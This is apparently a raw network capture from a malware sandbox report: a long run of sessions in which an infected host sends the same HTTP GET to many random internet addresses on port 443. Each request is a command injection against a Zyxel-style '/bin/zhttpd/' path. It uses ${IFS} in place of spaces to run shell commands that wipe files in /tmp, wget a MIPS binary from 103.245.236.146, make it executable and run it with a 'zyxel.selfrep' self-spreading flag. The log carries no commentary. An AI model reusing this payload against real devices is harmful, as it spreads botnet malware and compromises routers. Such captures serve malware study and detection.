                                                        Jan 28, 2024 10:12:40.154561043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1287192.168.2.1444616221.253.78.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154599905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1288192.168.2.1453564143.235.30.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154668093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1289192.168.2.1438560107.231.242.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154709101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1290192.168.2.1436244199.227.64.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154736042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1291192.168.2.1440400159.208.9.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154772043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1292192.168.2.1450606134.222.136.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154803038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1293192.168.2.144833484.33.232.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154833078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1294192.168.2.1453374185.184.163.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154890060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1295192.168.2.144112231.14.227.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154938936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1296192.168.2.145240862.249.31.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.154973030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1297192.168.2.144936032.110.225.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155021906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1298192.168.2.1455182200.179.170.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155045986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1299192.168.2.1437946108.29.121.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155100107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1300192.168.2.1455760189.218.255.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155128956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1301192.168.2.1434604156.178.195.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155147076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1302192.168.2.1434938197.225.185.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155210018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1303192.168.2.144149252.143.187.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155241966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1304192.168.2.143401281.219.0.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155292988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1305192.168.2.145539083.9.108.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155324936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1306192.168.2.1449280211.57.233.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155350924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1307192.168.2.1454154204.101.7.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155422926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1308192.168.2.1443020202.56.178.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155451059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1309192.168.2.1446844205.52.212.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155495882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1310192.168.2.143915683.90.228.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155527115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1311192.168.2.145637450.135.84.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155559063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1312192.168.2.1449600144.60.242.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155616999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1313192.168.2.145387840.219.140.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155651093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1314192.168.2.1444244105.251.90.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155682087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1315192.168.2.1451354144.43.13.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155704975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1316192.168.2.144375638.215.74.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155752897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1317192.168.2.143946490.62.134.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155786991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1318192.168.2.145995084.66.111.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155850887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1319192.168.2.1460142191.106.34.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155884027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1320192.168.2.145304623.6.190.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155911922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1321192.168.2.145021046.125.169.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155944109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1322192.168.2.144268483.195.104.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155977011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1323192.168.2.1444246177.3.236.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.155994892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1324192.168.2.144446819.160.235.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156029940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1325192.168.2.144146014.122.10.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156080961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1326192.168.2.1446300129.176.3.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156120062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1327192.168.2.1440822213.34.237.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156176090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1328192.168.2.145380223.154.153.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156219959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1329192.168.2.145219032.118.230.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156250000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1330192.168.2.1438680186.179.144.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156305075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1331192.168.2.145659654.204.91.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156328917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1332192.168.2.143832274.216.110.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156385899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1333192.168.2.14578281.112.250.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156409025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1334192.168.2.1440230191.198.34.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156467915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1335192.168.2.144768091.110.125.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156517029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1336192.168.2.145259472.96.155.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156563997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1337192.168.2.1436480203.211.78.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156599998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1338192.168.2.143963843.33.110.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156649113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1339192.168.2.1446956103.245.249.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156703949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1340192.168.2.1449710155.183.244.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156754971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1341192.168.2.145229438.30.87.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156797886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1342192.168.2.1444256115.248.43.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156820059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1343192.168.2.1452050145.45.50.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156857967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1344192.168.2.145230093.225.130.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156928062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1345192.168.2.1437710171.153.135.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156943083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1346192.168.2.1436918152.178.216.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:40.156994104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1347192.168.2.1451412184.223.185.219443
                                                        TimestampBytes transferredDirectionData
